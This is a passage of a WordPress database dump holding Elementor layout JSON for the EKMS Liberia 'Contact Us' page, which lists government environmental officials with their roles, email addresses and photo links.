Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23210,3362,'_elementor_edit_mode','builder'),(23211,3362,'_elementor_template_type','wp-page'),(23212,3362,'_elementor_version','3.0.16'),(23213,3362,'_wp_page_template','default'),(23214,3362,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah 